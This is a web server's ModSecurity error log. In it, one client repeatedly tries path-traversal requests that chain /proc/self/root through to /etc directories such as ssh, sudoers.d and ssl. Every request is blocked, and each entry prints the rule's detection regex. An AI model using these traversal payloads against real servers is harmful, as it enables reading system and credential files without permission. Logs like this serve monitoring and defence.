[Tue Mar 17 10:31:24.151647 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:58124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXrKBJNF7axNlVR0UDGAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:25.475288 2026] [:error] [pid 18604:tid 140411674785536] [client 74.7.243.203:58130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXrUBd0UqwxWindINt5AAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:26.797381 2026] [:error] [pid 18604:tid 140411708356352] [client 74.7.243.203:58142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXrkBd0UqwxWindINt5gAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:29.022329 2026] [:error] [pid 18604:tid 140411658000128] [client 74.7.243.203:58144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXsUBd0UqwxWindINt6QAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:31.766265 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:50370] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXs6BJNF7axNlVR0UDGgAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:35.255771 2026] [:error] [pid 18709:tid 140411708356352] [client 74.7.243.203:50384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXtzarLhPAjZGI1b2z7wAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:36.590139 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:50390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXuAeiSKl8TjouI-YHuwAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:37.872324 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.203:50396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXuQeiSKl8TjouI-YHvAAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:39.134929 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:50398] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXu5qmL8PQht4WJFlN2AAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:41.567157 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.243.203:44124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXvZqmL8PQht4WJFlN3AAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:42.808339 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:44138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXvqBJNF7axNlVR0UDGwAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:43.991831 2026] [:error] [pid 17965:tid 140411590858496] [client 74.7.243.203:44142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXv6t8Nd0UC_OcbVG02gAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:45.350813 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.243.203:44146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXwat8Nd0UC_OcbVG02wAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:46.636737 2026] [:error] [pid 18604:tid 140411641214720] [client 74.7.243.203:44158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXwkBd0UqwxWindINt6wAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:50.061767 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.203:44164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXxqt8Nd0UC_OcbVG04wAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:51.413252 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.203:45592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXx6t8Nd0UC_OcbVG05QAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:53.815111 2026] [:error] [pid 18709:tid 140411733534464] [client 74.7.243.203:45596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXyTarLhPAjZGI1b2z8wAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:55.065862 2026] [:error] [pid 18604:tid 140411540502272] [client 74.7.243.203:45598] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXy0Bd0UqwxWindINt7AAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:56.388397 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:45602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXzK4xEDsg_V3ESNY5SQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:57.495076 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.243.203:45604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXze82sZHvlq4xgHrJGQAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:58.729822 2026] [:error] [pid 18604:tid 140411582465792] [client 74.7.243.203:45614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXzkBd0UqwxWindINt7QAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:00.059201 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:45622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX0KBJNF7axNlVR0UDHwAAABM"], 